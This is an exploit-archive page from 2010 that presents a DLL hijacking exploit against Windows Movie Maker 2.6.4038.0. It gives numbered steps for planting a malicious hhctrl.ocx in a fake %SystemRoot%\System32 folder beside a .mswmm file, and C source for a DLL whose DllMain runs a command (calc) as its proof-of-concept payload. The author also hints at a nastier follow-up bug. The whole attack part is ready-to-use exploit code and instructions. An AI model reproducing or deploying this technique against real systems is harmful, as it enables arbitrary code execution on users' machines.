Home / exploits Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking
Posted on 24 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking (hhctrl.ocx)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================== Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking (hhctrl.ocx) ====================================================================== /* Exploit Title: Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc&displaylang=en Version: 2.6.4038.0 and prior Tested on: Windows 7 x86 (6.1.7600) There is a way more interesting bug there in which the program tries to load a driver file. It's in investigation, but has a nice potential for a nastier vulnerability. Meanwhile, enjoy =] Instructions: 1. Create a file with the following extension: .mswmm 2. Compile this library and rename it to hhctrl.ocx 2. On the same directory of the .mswmm file, create a directory called: %SystemRoot% 3. Inside %SystemRoot%, create a directory called: System32 4. Move hhctrl.ocx into the System32 directory that you have just created 5. Open the .mswmm file and enjoy the fireworks =] *Whispers* to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) int evil() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { evil(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>